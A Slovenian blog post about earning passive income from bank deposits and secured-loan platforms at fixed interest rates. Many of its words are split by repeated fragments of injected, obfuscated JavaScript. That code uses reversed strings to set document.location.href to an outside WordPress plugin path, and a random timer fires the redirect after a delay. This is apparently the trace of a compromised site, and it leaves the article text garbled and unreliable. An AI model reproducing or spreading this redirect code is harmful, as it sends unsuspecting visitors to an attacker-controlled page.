Dodaten zaslužek z vezavo sredstev in dano obrestno mero

By | 28 novembra, 2020

Različne investicijske možnosti ponujajo dober dodaten zaslužek, pri čemer pa je dobro poznati razmerje med donosnostjo in varnostjo oziroma tveganjem za izgube. Med bolj priljubljene možnosti za ustvarjanje pasivnega dohodka sodijo naložbe, ki se obrestujejo po dani obrestni meri in nudijo dvig vezanih sredstev ob zapadlosti investicije.

Med omenjene investicije spadajo predvsem bančni depoziti in druge naložbe, ki delujejo podobno kot depoziti. To so na primer zavarovana posojila, kjer vlagatelji financirajo posojilo posojilojemalca, za toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to pa pridobijo obrestno mero. Gre za nekakšno plemenitenje sredstev, kjer banke in investicijske platforme z različnimi mehanizmi zagotavljajo varnost, donosnost pa je odvisna od obrestne mere.

Dodaten zaslužek ustvarja dobra obrestna mera

Dobra obrestna mera je pri investicijah z vezavo sredstev ključnega pomena za ustvarjanje donosnosti. Pri bančnih depozitih je običajno dana fiksna obrestna mera, ki se obrestuje na glavnico skozi vnaprej določeno časovno obdobje. Variabilna obrestna mera ni dobra možnost, saj nanjo vpliva inflacija. Banke dajejo nekoliko višje obrestne mere za dolgoročne naložbe in obratno. V povprečju je donosnost okoli enega odstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totka na letni ravni.

Na drugi strani pa je pri zavarovanih posojilih dana fiksna obrestna mera, ki je določena glede na bonitetno oceno in kreditno sposobnost posojilojemalca. Višja obrestna mera nakazuje na slabšo bonitetno oceno posojilojemalca in obratno. To je povezano tudi s tveganjem, da posojilojemalec preneha odplačevati posojilo. Sicer pa je mogoče na letni ravni v povprečju ustvariti od 7 do 9 odstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totne letne donose.

Dodaten zaslužek z ustvarjanjem naložbenega portfelja

Vlagatelji lahko s pomočjo naložbenega portfelja razpršijo investicije in tveganja. Večina vlagateljev se pri bančnih depozitih in naložbah v zavarovana posojila odloča za razpršitev, saj v eno investicijo ne vežejo vseh sredstev, kar je racionalna izbira iz vidika donosnosti in zmanjševanja tveganj. Na investicijskih platformah so zapisani tudi minimalni zneski za investiranje, od deset evrov naprej. To omogoča ustvarjanje razgibanega naložbenega portfelja.

Nekatere investicijske platforme, ki ponujajo investiranje v zavarovana posojila, nudijo tudi funkcijo autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toinvest, ki vlagateljem omogoča, da prihranijo čas in prenesejo delo na programsko rešitev. Po nekaj vezavah sredstev v izbrane investicije, si program s pomočjo algoritmov zapomni predhodne odločitve in natoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to sam investira v nove naložbe, ki se pojavijo na platformi. Tako lahko investitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor le opazuje plemenitenje sredstev in si na koncu izplača dobiček na osebni bančni račun.

Vezava sredstev priložnost tudi za začetnike

Pri investiranju v vrednostne papirje, kot so delnice in obveznice, je potrebno imeti nekaj znanja in izkušenj, zatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to da bi vlagatelji vedeli, v katere naložbe investirati. Poleg tega se na borznem trgu odvijajo številne spremembe, ki se lahko spremenijo iz ure v uro. Še zadnji čas je potrebno delnice prodati, da ne bi izgubili celotne vložene glavnice.

Na drugi strani pa z vezavo sredstev v zavarovana posojila in depozite ni potrebno veliko znanja in izkušenj, prav tako ne ukvarjanja z naložbami, saj gre za plemenitenje sredstev skozi čas po vnaprej znani obrestni meri, ki se ne spreminja. Ko se naložba izteče s pričakovanim donosom, si vlagatelj dodaten zaslužek enostavno nakaže oziroma prenese na osebni račun.